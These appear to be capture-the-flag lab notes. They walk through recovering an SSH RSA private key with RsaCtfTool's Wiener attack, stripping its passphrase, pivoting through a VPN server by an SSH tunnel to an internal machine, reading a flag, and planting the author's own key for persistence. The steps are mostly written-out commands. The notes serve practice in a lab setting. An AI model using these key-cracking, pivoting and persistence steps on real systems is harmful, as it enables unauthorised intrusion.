- Resume From 🗂 VPN Server
- Email Server, rsa Key: 🗂 SSH RSA
- Wiener Attack
https://www.youtube.com/watch?v=M-yg0vbrAOk
https://cryptohack.gitbook.io/cryptobook/untitled/low-private-component-attacks/wieners-attack
- Get
https://github.com/RsaCtfTool/RsaCtfTool
into: 🗂 RsaCtfToool
- Running Rsa Ctf Tools
# python3 -m pip install -r 04-RsaCtfTool/requirements.txt
python3 04-RsaCtfTool/RsaCtfTool.py --publickey 02-ssh-rsa.rezaee.pub --attack wiener --private --output 05-rsa.rezaee.priv
- Change Access Permissions:
chmod 600 05-rsa.rezaee.priv
- Generate SSH Private Key:
ssh-keygen -p -N "password" -f 05-rsa.rezaee.priv
Password: password
- SSH into VPN Server
ssh -i ~/.ssh/id_rsa2 [email protected]
- Get IP of PC2
ping -t 1 pc2.petromaz.ir
- SSH Tunnel Through vpn server!
<Hacker>-------(SSH Tunnel)-------<VPN Server>--------------<PC2>
| |
----------------------(SSH Connection)--------------------
0.0.0.0:7777 10.3.151.195:22
# In a New Terminal
ssh -N -i ~/.ssh/id_rsa2 -L 0.0.0.0:7777:10.3.151.195:22 [email protected]
- Connect to PC2 through Tunnel
ssh -p 7777 -i 06-openssh.rezaee.priv [email protected]
- Read Flag: MAZAPA_dedcf160a1253afd73918666b0c6edb3
- Add Your own Private key into PC2